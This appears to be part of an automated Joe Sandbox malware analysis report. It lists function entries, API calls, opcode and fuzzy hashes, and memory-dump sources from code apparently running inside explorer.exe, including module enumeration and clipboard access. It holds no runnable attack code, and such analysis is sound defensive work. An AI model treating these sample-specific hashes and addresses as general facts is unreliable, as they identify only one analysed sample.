                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFAEF92
                                                                                                                                                                                                                          • Part of subcall function 0DFBC800: _lock.LIBCMT ref: 0DFBC812
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0DFAEFD8
                                                                                                                                                                                                                          • Part of subcall function 0DFBCFDC: setlocale.LIBCMT ref: 0DFBCFF0
                                                                                                                                                                                                                          • Part of subcall function 0DFBCFDC: _Yarn.LIBCPMT ref: 0DFBD00A
                                                                                                                                                                                                                          • Part of subcall function 0DFBCFDC: setlocale.LIBCMT ref: 0DFBD019
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFAEFF7
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFAF008
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E10EF92
                                                                                                                                                                                                                          • Part of subcall function 0E11C800: _lock.LIBCMT ref: 0E11C812
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0E10EFD8
                                                                                                                                                                                                                          • Part of subcall function 0E11CFDC: setlocale.LIBCMT ref: 0E11CFF0
                                                                                                                                                                                                                          • Part of subcall function 0E11CFDC: _Yarn.LIBCPMT ref: 0E11D00A
                                                                                                                                                                                                                          • Part of subcall function 0E11CFDC: setlocale.LIBCMT ref: 0E11D019
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E10EFF7
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E10F008
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0FF4EF92
                                                                                                                                                                                                                          • Part of subcall function 0FF5C800: _lock.LIBCMT ref: 0FF5C812
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0FF4EFD8
                                                                                                                                                                                                                          • Part of subcall function 0FF5CFDC: setlocale.LIBCMT ref: 0FF5CFF0
                                                                                                                                                                                                                          • Part of subcall function 0FF5CFDC: _Yarn.LIBCPMT ref: 0FF5D00A
                                                                                                                                                                                                                          • Part of subcall function 0FF5CFDC: setlocale.LIBCMT ref: 0FF5D019
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0FF4EFF7
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0FF4F008
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        • Opcode ID: 6316e364654e228a3c63f6698755658b4f82f4fde50ea094c3cfb14d0de8268f
                                                                                                                                                                                                                        • Instruction ID: fed2c027ea50c713a472610e376a4f8c488713ed290a2be84ceb757f611ce2bf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6316e364654e228a3c63f6698755658b4f82f4fde50ea094c3cfb14d0de8268f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE31C037B1478186DB208F29E580769BB66FB85F84F184226EB889BB5ACF78D4418704
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction ID: dba26cfe08536617e399aa4e41abd1f8d1ea242f7128adbf2e0f14eba55f9feb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D11A82231868496DA20DB2EE9903FA7365F7C53B4F818221DB9D47798DF7CCA058B10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction ID: d664556de05dc277657218147686c437a6fed0344922e3b8a243786437dc2159
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F11DA2231978482DE24DB25F5503AAB3A5FBC87A4F904A71DA9D47B98EF3CC945CB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction ID: af2c1fbe3deadd0270acac3750d2a2690dbb15457b24f4e113e28ec7271294bd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB11932221478582DE20EB65E9803AAB365FBC5B94F804321DF9E4779AEF3CC5158B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction ID: e8d72bfcbf1ebd41881b16bc6affebe7ae3eb8c46f8f078c57abd7380c5223fa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB018F71715B8082EE59DF26F99436963A2AB88FC0F185534EE5A07BA4DF3CC8C5C700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction ID: e5393a63b6a52a8ac444db3b7bdbc9e04ed21ae2e414f55a75c0fd26ec2828a1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF012C22B15B4282EE699F16B984379A361AF88FD0F485138DE5B07B55DF3CE096D700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: 6f83b9fd174b7d68d54f8bf3cf50e0c67aed4201c37d2f6b7d39ca21b656238f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45F0543021CD0A8FD765FF9DC4C0A7972A0FB4C250B8665A99B4CD7105CE20D5918755
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: 7b022526d96069ce91de02df67151b7cb945a0c26eb47bff3757c6cb520442ec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DF08974238919CFC79CFB9CC1D0A6873A1FB4C212F4515A9D94DC7306C930A4D28761
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: 6e4c017c9a245da40c884e09bf903b97976d7b2ea693450cffc005cb77ee456a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5BF0543021890D8FCBA4FFDCD0D4AA862D0FB5C210B8D09A99608CB115C9309CA19751
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFBE0F1
                                                                                                                                                                                                                          • Part of subcall function 0DFC289C: _getptd_noexit.LIBCMT ref: 0DFC28A2
                                                                                                                                                                                                                          • Part of subcall function 0DFC289C: _amsg_exit.LIBCMT ref: 0DFC28B2
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0DFBE0FF
                                                                                                                                                                                                                          • Part of subcall function 0DFC50A0: DecodePointer.KERNEL32 ref: 0DFC50AB
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFBE104
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0DFBE120
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFBE130
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: f7e21ee678c3e375370c0ed27db2e1c08ada88521b0c661fe0f02b330fdde24f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1E06533618682E1CA21BB5EE6801FD7364E74CB90F5DF43AEB4407309DE20D8A08355
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E11E0F1
                                                                                                                                                                                                                          • Part of subcall function 0E12289C: _getptd_noexit.LIBCMT ref: 0E1228A2
                                                                                                                                                                                                                          • Part of subcall function 0E12289C: _amsg_exit.LIBCMT ref: 0E1228B2
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0E11E0FF
                                                                                                                                                                                                                          • Part of subcall function 0E1250A0: DecodePointer.KERNEL32 ref: 0E1250AB
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E11E104
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0E11E120
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E11E130
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: e27d6c4d98f785313e8dc8bf419aba03b9bca908b47b3f1d7c481951b24d27f6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04E03932315680C1CA15ABE2E8905BD63E1EB8CB80F9D89B9CF450B309DF20CCE0C356
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF5E0F1
                                                                                                                                                                                                                          • Part of subcall function 0FF6289C: _getptd_noexit.LIBCMT ref: 0FF628A2
                                                                                                                                                                                                                          • Part of subcall function 0FF6289C: _amsg_exit.LIBCMT ref: 0FF628B2
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0FF5E0FF
                                                                                                                                                                                                                          • Part of subcall function 0FF650A0: DecodePointer.KERNEL32 ref: 0FF650AB
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF5E104
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0FF5E120
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF5E130
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: c2b763d771e1a2505cce4a9a20b627a5b6ca193bf27ae68d3f8521cabe0e7ed1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE03933A14681D1CF156BB5E9801AD7361EB8CF80F8C8532CF840B207DE28D5908355
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEFA37A
                                                                                                                                                                                                                          • Part of subcall function 0DEEF0F5: _getptd_noexit.LIBCMT ref: 0DEEF0F9
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEFA386
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEFA3AD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction ID: 1d8b0c00847554e6f2f0990aba6e0be5d7cd7c8beaadd5a90b8e18b3dab03c0d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3521DA1062DEC98EE31B673C488433D3AD9FB5B149F1960F9878ACF156DD65C8428311
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0824A37A
                                                                                                                                                                                                                          • Part of subcall function 0823F0F5: _getptd_noexit.LIBCMT ref: 0823F0F9
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0824A386
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0824A3AD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction ID: 28a7399a7cb15984ce9f096a6fc23d2565577b3f2bc5395ed11871e2abc2b69a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35210A146BCEE98EE31E677C44943353EC5EB5B247F1860EDD487CB256E9A588438321
